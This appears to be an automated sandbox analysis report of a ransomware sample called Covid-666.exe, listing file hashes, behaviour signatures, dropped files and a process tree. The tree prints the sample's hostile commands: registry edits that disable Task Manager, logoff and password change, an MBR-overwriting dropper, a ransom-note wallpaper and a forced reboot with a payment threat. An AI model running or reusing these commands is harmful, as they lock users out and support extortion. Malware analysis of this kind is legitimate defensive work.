Overview

overview

8

Static

static

7

Covid-666.exe

windows7-x64

8

Covid-666.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    29/05/2024, 15:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Covid-666.exe

  • Size

    687KB

  • MD5

    0c303ae1347c0395a96f3eb38d26d7ed

  • SHA1

    c8cf473a22fc86ddad00ec286e94422f4b7d5c59

  • SHA256

    1eefaeb98524277d1aeb459b6e4a31472ce2f4ff15f8f45b051e1c8a021c8fa7

  • SHA512

    57e9ca4e5339164a6c3e5f53b8f30410d86139355390e17a2926d5b2263a511f0d47b26f70e95a5cf8daf4c365fec7f057614636e6f092d8320fcdda8debea93

  • SSDEEP

    12288:U7M23cFQpIn5tghlAjyCey1vLd31utolsqHzc30qOocuXi7oS:Ug2sq2nohlAtrvLjutQtI3bOoli

Score
8/10
bootkitevasionpersistenceransomwareupx

Malware Config

Signatures

  • Disables Task Manager via registry modification
    evasion
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Covid-666.exe
    "C:\Users\Admin\AppData\Local\Temp\Covid-666.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2920
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\2E80.tmp\Covid666.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2736
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2864
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2856
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2600
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2592
      • C:\Users\Admin\AppData\Local\Temp\2E80.tmp\mbr.exe
        mbr.exe
        3⤵
        • Executes dropped EXE
        • Writes to the Master Boot Record (MBR)
        PID:2240
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:2700
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:2236
        • C:\Windows\SysWOW64\rundll32.exe
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          3⤵
            PID:2496
          • C:\Windows\SysWOW64\rundll32.exe
            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
            3⤵
              PID:2492
            • C:\Windows\SysWOW64\rundll32.exe
              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
              3⤵
                PID:2980
              • C:\Windows\SysWOW64\reg.exe
                reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                3⤵
                • Modifies registry key
                PID:2676
              • C:\Users\Admin\AppData\Local\Temp\2E80.tmp\MainWindow.exe
                MainWindow.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:2632
              • C:\Windows\SysWOW64\shutdown.exe
                shutdown /r /t 240 /c "You have only 4 minutes to complete the payment or all your data is lost forever"
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2524
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
                3⤵
                • Sets desktop wallpaper using registry
                PID:2540
              • C:\Windows\SysWOW64\rundll32.exe
                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                3⤵
                  PID:2588
                • C:\Windows\SysWOW64\rundll32.exe
                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                  3⤵
                    PID:2936
                  • C:\Windows\SysWOW64\rundll32.exe
                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                    3⤵
                      PID:2748
                    • C:\Windows\SysWOW64\rundll32.exe
                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                      3⤵
                        PID:2136
                      • C:\Windows\SysWOW64\rundll32.exe
                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                        3⤵
                          PID:2244
                        • C:\Windows\SysWOW64\rundll32.exe
                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                          3⤵
                            PID:2388
                          • C:\Windows\SysWOW64\rundll32.exe
                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                            3⤵
                              PID:468
                            • C:\Windows\SysWOW64\rundll32.exe
                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                              3⤵
                                PID:1800
                              • C:\Windows\SysWOW64\rundll32.exe
                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                3⤵
                                  PID:2004
                                • C:\Windows\SysWOW64\rundll32.exe
                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                  3⤵
                                    PID:1288

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Temp\2E80.tmp\Covid666.bat
                                Filesize

                                1KB

                                MD5

                                5e19b2eeb24514e87aa6039bd012fa6e

                                SHA1

                                4f8ad456f7050a8fa572043dc42a0ae5bd0dc6a5

                                SHA256

                                0cabbe47e3a8799502084b4c691634d16dc3bf317fc17d9d898ed336a476c778

                                SHA512

                                8c9faabd001af53f081c2fe38bd3c930de8c4aa1813afb66b106ffbdd796040b1dcc11ddccf965edf100283f38e587d4d937cbb4455379317ce5a5b59b7c8cc8

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\2E80.tmp\mbr.exe
                                Filesize

                                1.3MB

                                MD5

                                2b1aa2297f9f2d08bc1447213ef869a9

                                SHA1

                                198802a4d09f9b4f7d2514575c3b9d35afca6833

                                SHA256

                                c9c6b0edd58fc2e85c44774c457a6c03c05253e1dbca91645b2c4ba1449e0f11

                                SHA512

                                7affd52dc3287d33c8587f63764593496d179d5595a55ba96a4d8ded8b2730465f0447d9ca7e07cb62c48f4097a1fbb554a90d0566b0b7e6227cc535ad467b13

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\2E80.tmp\note.bmp
                                Filesize

                                806KB

                                MD5

                                4a43a8b397043b6eb9c5359cf45da6f8

                                SHA1

                                d672f59eef6ec2d82b925b74608b6ecea8f16db8

                                SHA256

                                3aabd4300d36cac3e85dee2274351b0e58c2f19b59b607751127f5ae0c2bc8a1

                                SHA512

                                f77290245703c8790c9e1709f91991437601847d3c4afef34f03032b7d754016f5fc569ff4ce5f6f224a6b60a27d2853519b77170f6f5366221170fb4523f201

                                Download Submit

                              • \Users\Admin\AppData\Local\Temp\2E80.tmp\MainWindow.exe
                                Filesize

                                20KB

                                MD5

                                23ab00deb47223ba73b700eb371fb0fe

                                SHA1

                                ba2e077c3790bdae4083fe9283f38a13efdcc4b1

                                SHA256

                                d42807867bd69d5db2605e4e6f39e5f70e0cc9db0cac9216fd6a9cd8cc324e0d

                                SHA512

                                d37252a1620f532230160f16c5d87fc79928842c0af41805c1fed1115ef0cfca6767d48c5d9ce6c6a4b042cd152cd1a2f9b49ad9380b08980680b26c5a4805c5

                                Download Submit

                              • memory/2240-28-0x0000000000400000-0x00000000004D8000-memory.dmp

                                Filesize

                                864KB

                                Download

                              • memory/2920-0-0x0000000000400000-0x000000000064F000-memory.dmp

                                Filesize

                                2.3MB

                                Download

                              • memory/2920-39-0x0000000000400000-0x000000000064F000-memory.dmp

                                Filesize

                                2.3MB

                                Download